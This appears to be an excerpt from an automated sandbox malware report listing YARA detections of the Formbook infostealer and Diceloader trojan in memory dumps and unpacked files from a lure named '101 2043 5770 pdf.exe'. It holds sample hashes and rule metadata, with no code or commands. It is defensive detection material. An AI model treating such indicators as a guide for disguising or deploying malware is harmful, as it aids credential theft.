Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.4604222907.0000000011264000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Diceloader_15eeb7b9 reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
